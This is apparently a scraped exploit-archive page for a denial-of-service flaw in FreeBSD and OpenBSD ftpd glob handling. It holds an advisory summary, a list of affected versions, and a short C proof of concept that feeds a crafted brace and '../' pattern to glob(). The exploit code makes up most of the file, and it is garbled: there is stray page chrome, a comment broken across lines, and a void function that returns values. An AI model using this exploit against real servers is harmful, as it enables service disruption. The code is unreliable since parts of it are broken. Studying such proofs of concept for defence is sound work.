47 lines
No EOL
1.4 KiB
C
47 lines
No EOL
1.4 KiB
C
// source: https://www.securityfocus.com/bid/38559/info
|
|
|
|
The FreeBSD and OpenBSD 'ftpd' service is prone to a denial-of-service vulnerability because of a NULL-pointer dereference.
|
|
|
|
Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
|
|
|
|
This issue affects the following releases:
|
|
|
|
FreeBSD 8.0, 6.3, 4.9
|
|
OpenBSD 4.5 and 4.6
|
|
|
|
#include <glob.h>
|
|
#include <stdio.h>
|
|
|
|
#define MAXUSRARGS 100
|
|
#define MAXGLOBARGS 1000
|
|
|
|
void do_glob() {
|
|
glob_t gl;
|
|
char **pop;
|
|
|
|
char buffer[256];
|
|
strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}");
|
|
|
|
int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
|
|
memset(&gl, 0, sizeof(gl));
|
|
gl.gl_matchc = MAXGLOBARGS;
|
|
flags |= GLOB_LIMIT;
|
|
if (glob(buffer, flags, NULL, &gl)) {
|
|
printf("GLOB FAILED!\n");
|
|
return 0;
|
|
}
|
|
else
|
|
// for (pop = gl.gl_pathv; pop && *pop && 1 <
|
|
(MAXGLOBARGS-1);
|
|
for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
|
|
pop++) {
|
|
printf("glob success");
|
|
return 0;
|
|
}
|
|
globfree(&gl);
|
|
}
|
|
|
|
main(int argc, char **argv) {
|
|
do_glob();
|
|
do_glob();
|
|
} |